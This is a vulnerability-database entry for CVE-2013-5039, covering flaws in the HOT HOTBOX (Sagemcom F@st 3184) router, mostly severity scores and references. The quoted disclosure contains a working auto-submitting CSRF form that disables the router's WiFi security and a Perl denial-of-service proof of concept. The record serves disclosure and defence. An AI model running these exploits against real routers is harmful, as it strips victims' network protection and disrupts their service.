Details of VAR-201312-0133

ID

VAR-201312-0133

CVE

CVE-2013-5039

TITLE

HOT HOTBOX Router Software goform/wlanBasicSecurity Vulnerable to cross-site request forgery

Trust: 0.8

sources: JVNDB: JVNDB-2013-005733

DESCRIPTION

Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter. HOT HOTBOX router is a router device. Such as changing the WIFI security field. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+ Vulnerabilities List - # Default WPS Pin # Authentication based on IP Address # DoS via crafted POST # Path/Directory Traversal # Script injection via DHCP request # No CSRF Token Demo - http://www.youtube.com/watch?v=CPlT09ZIj48 CSRF EXPLOIT: <html> <form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1> <input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr"> <input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1"> <input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1"> <input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode"> <input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1"> <input type=hidden name="NBandwidth1" value="20" id="NBandwidth1"> <input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1"> <input type=hidden name="WifiSecurity" value="0" id="WifiSecurity"> <input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity"> <input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1"> <input type=hidden name="scanActions1" value="0" id="scanActions1"> <input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1"> <input type=hidden name="wpsActions1" value="0" id="wpsActions1"> </form> </html> <script>document.getElementById(1).submit();</script> DENIAL OF SERVICE EXPLOIT: use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent; # Author: Oz Elisyan # Date: 3 September 2013 # Affected Version: <= 2.1.11 print "# HOTBOX DoS PoC #\n\n" unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); } print "Sending Evil POST request...\n"; my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req); print "Done.";

Trust: 2.61

sources: NVD: CVE-2013-5039 // JVNDB: JVNDB-2013-005733 // CNVD: CNVD-2014-00017 // BID: 63550 // VULHUB: VHN-65041 // PACKETSTORM: 123901

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2014-00017

AFFECTED PRODUCTS

vendor:	hot	model:	hotbox router	scope:	eq	version:	2.1.11	Trust: 3.0
vendor:	hot	model:	hotbox router	scope:	eq	version:	-	Trust: 1.0
vendor:	hot	model:	hotbox router	scope:	-	version:	-	Trust: 0.8
vendor:	sagecom	model:	f@st router	scope:	eq	version:	31842.1.11	Trust: 0.3

sources: CNVD: CNVD-2014-00017 // BID: 63550 // JVNDB: JVNDB-2013-005733 // CNNVD: CNNVD-201312-562 // NVD: CVE-2013-5039

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2013-5039
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2013-5039
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2014-00017
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201312-562
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-65041
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2013-5039
severity:	MEDIUM
baseScore:	5.4
vectorString:	AV:A/AC:M/AU:N/C:P/I:P/A:P
accessVector:	ADJACENT_NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	5.5
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2014-00017
severity:	MEDIUM
baseScore:	5.4
vectorString:	AV:A/AC:M/AU:N/C:P/I:P/A:P
accessVector:	ADJACENT_NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	5.5
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-65041
severity:	MEDIUM
baseScore:	5.4
vectorString:	AV:A/AC:M/AU:N/C:P/I:P/A:P
accessVector:	ADJACENT_NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	5.5
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: CNVD: CNVD-2014-00017 // VULHUB: VHN-65041 // JVNDB: JVNDB-2013-005733 // CNNVD: CNNVD-201312-562 // NVD: CVE-2013-5039

PROBLEMTYPE DATA

problemtype:

CWE-352

Trust: 1.9

sources: VULHUB: VHN-65041 // JVNDB: JVNDB-2013-005733 // NVD: CVE-2013-5039

THREAT TYPE

specific network environment

Trust: 0.6

sources: CNNVD: CNNVD-201312-562

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201312-562

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-005733

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-65041

PATCH

title:

Top Page

url:

http://www.hot.net.il/heb/Main/

Trust: 0.8

sources: JVNDB: JVNDB-2013-005733

EXTERNAL IDS

db:	NVD	id:	CVE-2013-5039	Trust: 3.5
db:	PACKETSTORM	id:	123901	Trust: 3.2
db:	BID	id:	63550	Trust: 0.9
db:	JVNDB	id:	JVNDB-2013-005733	Trust: 0.8
db:	CNNVD	id:	CNNVD-201312-562	Trust: 0.7
db:	CNVD	id:	CNVD-2014-00017	Trust: 0.6
db:	EXPLOIT-DB	id:	29518	Trust: 0.1
db:	VULHUB	id:	VHN-65041	Trust: 0.1

sources: CNVD: CNVD-2014-00017 // VULHUB: VHN-65041 // BID: 63550 // JVNDB: JVNDB-2013-005733 // PACKETSTORM: 123901 // CNNVD: CNNVD-201312-562 // NVD: CVE-2013-5039

REFERENCES

url:	http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html	Trust: 3.1
url:	http://www.youtube.com/watch?v=cplt09zij48	Trust: 2.4
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5039	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5039	Trust: 0.8
url:	http://www.sagemcom.com/index.php?id=1760&l=25	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2013/nov/17	Trust: 0.3
url:	https://nvd.nist.gov/vuln/detail/cve-2013-5038	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-5220	Trust: 0.1
url:	http://$host/goform/login";	Trust: 0.1
url:	http://192.168.1.1/goform/wlanbasicsecurity'	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-5037	Trust: 0.1
url:	http://elisyan.com/hotboxcsrf.html	Trust: 0.1
url:	http://elisyan.com/hotboxdos.pl,	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-5039	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-5219	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-5218	Trust: 0.1

sources: CNVD: CNVD-2014-00017 // VULHUB: VHN-65041 // BID: 63550 // JVNDB: JVNDB-2013-005733 // PACKETSTORM: 123901 // CNNVD: CNNVD-201312-562 // NVD: CVE-2013-5039

CREDITS

Oz Elisyan

Trust: 0.4

sources: BID: 63550 // PACKETSTORM: 123901

SOURCES

db:	CNVD	id:	CNVD-2014-00017
db:	VULHUB	id:	VHN-65041
db:	BID	id:	63550
db:	JVNDB	id:	JVNDB-2013-005733
db:	PACKETSTORM	id:	123901
db:	CNNVD	id:	CNNVD-201312-562
db:	NVD	id:	CVE-2013-5039

LAST UPDATE DATE

2025-04-11T22:48:26.830000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2014-00017	date:	2014-01-02T00:00:00
db:	VULHUB	id:	VHN-65041	date:	2013-12-30T00:00:00
db:	BID	id:	63550	date:	2013-09-09T00:00:00
db:	JVNDB	id:	JVNDB-2013-005733	date:	2014-01-06T00:00:00
db:	CNNVD	id:	CNNVD-201312-562	date:	2013-12-31T00:00:00
db:	NVD	id:	CVE-2013-5039	date:	2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2014-00017	date:	2014-01-02T00:00:00
db:	VULHUB	id:	VHN-65041	date:	2013-12-30T00:00:00
db:	BID	id:	63550	date:	2013-09-09T00:00:00
db:	JVNDB	id:	JVNDB-2013-005733	date:	2014-01-06T00:00:00
db:	PACKETSTORM	id:	123901	date:	2013-11-04T13:03:33
db:	CNNVD	id:	CNNVD-201312-562	date:	2013-12-31T00:00:00
db:	NVD	id:	CVE-2013-5039	date:	2013-12-30T04:53:07.193